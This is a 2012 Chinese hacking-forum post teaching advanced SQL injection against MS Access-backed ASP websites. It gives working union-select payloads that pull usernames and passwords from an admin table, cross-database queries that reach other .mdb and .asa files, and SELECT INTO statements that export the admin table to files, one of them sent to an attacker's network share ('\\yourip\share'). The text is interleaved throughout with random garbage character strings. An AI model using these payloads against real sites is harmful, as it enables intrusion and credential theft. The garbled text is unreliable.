找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2203|回复: 0
打印 上一主题 下一主题

Access高级注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:20:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
--------------------------------------------------------------
4 o& g7 v7 N$ G3 j' lunion查询法! J8 ^6 s! F7 T3 r. W* ]
首先要说的就是查询办法,一般的查询办法就是
% ?% c4 C8 R7 R/ U* \, _% y; ~* |
6 f( q8 _" T# \3 k/ z: n! w3 j7 h程序代码
1 w- l; D. G) h* E) I- Pand 1=(select count(*) from admin where left(id,1)='1')
' D0 o+ f- a9 x# Y7 p% F2 G. L  u
这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.
9 }, ^% n4 D' Q3 n所以这个时候,union select横空出现.别以为只能在PHP里用哦...
- i$ }8 x, s$ ^譬如你有一个ACCESS点:
6 `2 k/ q0 `1 F3 `6 q$ W# I程序代码
7 c! a) t, D! N+ C/ xhttp://bbs.tian6.com/xiaoyang.asp?coder=1* `/ v' S7 F! L8 J9 h0 S8 R6 n
9 H; o+ j* t8 |0 A
知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),
. ~& R# `6 r: _& L) B然后我们直接来:
5 R3 ], p0 n0 ^. P$ s程序代码
. l' @0 f* a5 q' d; Y# ghttp://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]0 ~0 S: g* R* y! n

3 u; U# V# a4 _0 [这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.
  H$ I1 G* `3 Z7 \% P+ U9 o* F- k0 x# h4 d2 i. O7 v) n3 x

, {0 j" w$ C% O, @, J; q- E" u+ L  k6 w8 D
---------------------------------------------------------------7 V  }4 c2 E, Y( w
Access跨库查询; V, N6 z7 [* n/ ]* c
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.
4 |5 V0 D* j5 Z$ ^# F7 r& x跨库的查询语句:
7 o; C1 O0 C- p# N9 n; ^子查询:
+ Z- b9 D" |  V5 w程序代码
% X! T5 N7 i2 A8 Cand (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
  z8 L/ V/ P) V% D2 Y& L
* d9 ?  o. h1 f' Funion查询:5 {# Q& r4 Q, o0 G9 y' J- ]
程序代码
: ^0 A; u4 ~, e$ Zunion select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1
6 m1 B/ y/ B; H* G1 @/ A
5 r6 l# m' h) E! V# V跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:
1 E3 e8 z7 W' n3 c程序代码
: {3 l! {3 u# [' ehttp://www.4ngel.net/article/46.htm
" C5 g8 Y7 ~+ `http://hf110.com/Article/hack/rqsl/200502/66.html
. @2 G9 `( t) U) i
8 ~: H; E% j( P" S7 T' f/ h$ h---------------------------------------------------------------
! }$ r! a7 z8 VAccess注入,导出txt,htm,html
3 U* E. O7 b* v3 Y. ?子查询语句:  I, y: d! @+ v+ h9 I; R0 K  Y$ Q+ H/ d
程序代码  I( j% e4 M* Q3 z, \! }
Select * into [test.txt] in 'd:\web\' 'text;' from admin
. n" N$ L7 i* G. y5 f$ B: E/ m. p' `- w0 I0 r  ^
这样就把admin表的内容以test类型存进了d:\web里面.
8 E( B1 n& S- nUNION查询:
7 s% O( f: i: Q# K5 p0 ^+ V& K# Y5 ]程序代码
. D0 I0 U$ h  `8 @union select * into [admin.txt] in 'c:\' 'test;' from admin9 q* S3 {) y1 c) A

+ m: I" u+ w9 V3 Y5 k8 j) d) ?* x而且这里也可以保存到本地来:
$ T( ?9 m' B) u程序代码
  g# ]& X. f3 rSelect * into [test.txt] in '\\yourip\share' 'text;' from admin2 \* q2 j4 X! H* \5 S
3 T& h8 M1 S) g3 ?* k
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:
6 i6 L4 ?# y) @
! T+ h- ~% R# C* E7 j/ V# {程序代码' L* t1 G* t8 [- u; A. }
http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7
" W/ A' w5 m; P: w& X7 r5 d
( }& q1 G- a; X7 o, W3 S因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang  asp.asp之类的文件或者目录来导进文件~还是会很强大的.% V9 B# i  E& z$ T* S2 a' y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表